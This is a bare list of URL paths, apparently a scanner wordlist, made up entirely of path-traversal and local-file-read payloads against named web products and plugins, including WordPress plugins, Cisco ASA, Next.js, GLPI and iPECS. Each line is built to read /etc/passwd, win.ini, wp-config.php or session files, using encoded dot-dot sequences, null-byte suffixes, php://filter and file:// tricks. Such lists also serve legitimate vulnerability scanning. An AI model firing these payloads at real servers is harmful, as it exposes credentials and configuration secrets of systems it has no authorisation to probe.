/adm/file.cgi?next_file=%2fetc%2fpasswd
/document.php?modulepart=project&file=../../../../../../../etc/passwd
/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..
/.../.../.../.../.../.../.../.../.../windows/win.ini
/.../.../.../.../.../.../.../.../.../etc/passwd
/_next/../../../../../../../../../../etc/passwd
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
/_next/../../../../../../../../../etc/passwd
/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
/api/filemanager?path=%2F..%2f..%2fContent
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
/AvalancheWeb/image?imageFilePath=C:/windows/win.ini
/getCorsFile?urlPath=file:///etc/passwd
/getCorsFile?urlPath=file:///c://windows/win.ini
/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
/.cpr/%2Fetc%2Fpasswd
/installed_emanual_list.html
/tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../etc/passwd&Request=x&layer=.
/download_work_dir_file?path=/etc/passwd
/downloadfile.php?file=../../../../../../../../../../etc/passwd
/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
/compress.php?file=../../../../../../../etc/passwd
/appmonitor/protected/selector/server_file/files?folder=C://&suffix=
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
